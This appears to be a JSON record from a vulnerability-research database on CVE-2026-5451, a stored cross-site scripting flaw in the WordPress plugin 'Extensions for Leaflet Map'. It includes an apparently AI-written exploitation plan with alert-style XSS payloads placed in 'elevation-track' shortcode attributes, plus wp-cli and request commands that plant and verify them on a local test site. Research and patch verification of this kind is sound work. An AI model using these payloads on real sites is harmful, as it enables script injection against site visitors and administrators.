[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fTrJ3oNP3ftdirviF_ZfUFxj6ZlFS4aJdFJiPTwXkIBg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-5451","extensions-for-leaflet-map-authenticated-contributor-stored-cross-site-scripting-via-elevation-track-shortcode","Extensions for Leaflet Map \u003C= 4.14 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'elevation-track' Shortcode","The Extensions for Leaflet Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'elevation-track' shortcode in all versions up to, and including, 4.14. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","extensions-leaflet-map",null,"\u003C=4.14","4.15","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-02 00:00:00","2026-04-08 20:25:09",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7749c45a-f956-4df6-98d0-5ec0db95185e?source=api-prod",7,[22,23,24,25,26,27,28,29],"admin.php","admin\u002Fawesome.php","admin\u002Fdeleting.php","admin\u002Felevation\u002Felevation.php","admin\u002Felevation\u002Fmain.php","admin\u002Felevation\u002Fmultielevation.php","admin\u002Felevation\u002Fowncolors.php","admin\u002Felevation\u002Fowntheme.php","researched",false,3,"This research plan focuses on exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the `Extensions for Leaflet Map` plugin via the `elevation-track` shortcode.\n\n### 1. Vulnerability Summary\nThe `Extensions for Leaflet Map` plugin (\u003C= 4.14) fails to sufficiently sanitize and escape user-supplied attributes within the `elevation-track` shortcode. This shortcode is designed to define tracks for elevation profiles. When a user with `Contributor` permissions or higher creates a post containing this shortcode with a malicious payload in attributes like `name`, `file`, `lat`, or `lng`, the payload is stored in the database. When any user (including Administrators) views the post, the unsanitized input is rendered in the HTML or passed into a JavaScript context, leading to script execution.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[elevation-track]`\n*   **Vulnerable Attributes:** `name` (primary suspect), `file`, `lat`, `lng`.\n*   **Authentication Level:** Authenticated, Contributor+. Contributors can create posts and insert shortcodes.\n*   **Endpoint:** `wp-admin\u002Fpost.php` (for injection via post creation\u002Fediting) and the frontend post URL (for execution).\n*   **Preconditions:** The base `Leaflet Map` plugin must be active, as this plugin extends it. The `[leaflet-map]` and `[multielevation]` shortcodes may be required on the same page to trigger the rendering logic for `elevation-track` tracks.\n\n### 3. Code Flow\n1.  **Entry Point:** A user saves a post containing:\n    `[elevation-track name='\u003Cscript>alert(1)\u003C\u002Fscript>' file='https:\u002F\u002Fexample.com\u002Ftrack.gpx']`\n2.  **Storage:** WordPress saves this in the `wp_posts` table, `post_content` column.\n3.  **Rendering (Sink):** When the post is viewed:\n    *   WordPress calls `do_shortcode()`.\n    *   The plugin's shortcode handler for `elevation-track` is executed.\n    *   Based on `admin\u002Felevation\u002Fmultielevation.php` documentation, these attributes are collected to build a track list.\n    *   The handler likely outputs the `name` attribute directly into the HTML (e.g., in a `data-name` attribute or a list item) or localizes it into a JavaScript object for the Leaflet Elevation library.\n    *   Failure to use `esc_attr()`, `esc_html()`, or `wp_json_encode()` at the point of output results in XSS.\n\n### 4. Nonce Acquisition Strategy\n**No nonce is required** to exploit this vulnerability.\n*   The injection occurs by saving a standard WordPress post\u002Fpage.\n*   WordPress handles the `_wpnonce` for the `post.php` editor internally.\n*   The execution happens automatically when a victim views the affected post; no frontend nonce is required to trigger the XSS.\n\n### 5. Exploitation Strategy\nThe goal is to inject a payload via the `name` attribute of the `elevation-track` shortcode.\n\n**Step-by-Step Plan:**\n1.  **Login as Contributor:** Use the `http_request` tool to authenticate as a user with the `contributor` role.\n2.  **Create Post:** Use the `http_request` tool to send a POST request to `wp-admin\u002Fpost-new.php` or use `wp-cli` to create a post with the malicious shortcode.\n    *   **Payload 1 (HTML Breakout):** `[elevation-track name='\">\u003Cscript>alert(\"XSS\")\u003C\u002Fscript>' file='https:\u002F\u002Fexample.com\u002Ft.gpx']`\n    *   **Payload 2 (Attribute Injection):** `[elevation-track name=\"' onmouseover='alert(1) \" file='https:\u002F\u002Fexample.com\u002Ft.gpx']`\n    *   **Payload 3 (Direct Script):** `[elevation-track name='\u003Cimg src=x onerror=alert(document.domain)>' file='https:\u002F\u002Fexample.com\u002Ft.gpx']`\n3.  **Ensure Context:** The documentation in `admin\u002Felevation\u002Fmultielevation.php` suggests `elevation-track` is part of a set. Use this structure:\n    ```\n    [leaflet-map]\n    [elevation-track file=\"https:\u002F\u002Fexample.com\u002Ftest.gpx\" name=\"\u003Cimg src=x onerror=alert(1)>\"]\n    [multielevation]\n    ```\n4.  **View Post:** Navigate to the published post's URL using `browser_navigate`.\n5.  **Verify Execution:** Use `browser_eval` to check for the existence of the alert or evidence of the payload in the DOM.\n\n### 6. Test Data Setup\n*   **User:** Create a user with the role `contributor`.\n*   **Plugins:** \n    *   Ensure `leaflet-map` (base plugin) is installed and active.\n    *   Ensure `extensions-leaflet-map` (target) is installed and active.\n*   **Shortcode Wrapper:** Create a post as Contributor:\n    ```bash\n    wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_content='[leaflet-map][elevation-track file=\"https:\u002F\u002Fraw.githubusercontent.com\u002FRaruto\u002Fleaflet-elevation\u002Fmaster\u002Fexamples\u002Fdemo.gpx\" name=\"\u003Cimg src=x onerror=alert(document.domain)>\"][multielevation]' --post_author=2\n    ```\n\n### 7. Expected Results\n*   When the post is rendered, the HTML source will contain the unescaped `\u003Cimg>` tag or `\u003Cscript>` tag.\n*   The browser will execute the `alert(document.domain)` payload.\n*   If the payload is inside a Leaflet JavaScript initialization block, the script will break the string literal and execute.\n\n### 8. Verification Steps\n1.  **Check Database:**\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test'\"\n    ```\n2.  **Check Frontend HTML:**\n    Use `http_request` (GET) to fetch the post URL and grep for the payload:\n    ```bash\n    http_request GET http:\u002F\u002Flocalhost:8080\u002F?p=POST_ID\n    # Look for: \u003Cimg src=x onerror=alert(document.domain)>\n    ```\n3.  **Check DOM in Browser:**\n    Use `browser_eval(\"document.body.innerHTML.includes('onerror=alert')\")`.\n\n### 9. Alternative Approaches\n*   **Attribute: `file`**: If `name` is sanitized, try the `file` attribute. The plugin might attempt to use the URL in a way that allows `javascript:` protocol or attribute breakout.\n    *   `[elevation-track file='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   **Attribute: `lat` \u002F `lng`**: These are often treated as numbers, but if the plugin doesn't cast them to `float`, they can carry strings.\n    *   `[elevation-track lat='\u003Cscript>alert(1)\u003C\u002Fscript>' lng='0']`\n*   **SVG Injection:** If the plugin allows specifying a GPX\u002FKML file that it then parses and reflects parts of (like track names from within the XML), try hosting a malicious GPX file. However, the CVE specifically points to shortcode attributes.","gemini-3-flash-preview","2026-04-17 21:52:35","2026-04-17 21:53:03",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.14","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fextensions-leaflet-map\u002Ftags\u002F4.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fextensions-leaflet-map.4.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fextensions-leaflet-map\u002Ftags\u002F4.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fextensions-leaflet-map.4.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fextensions-leaflet-map\u002Ftags"]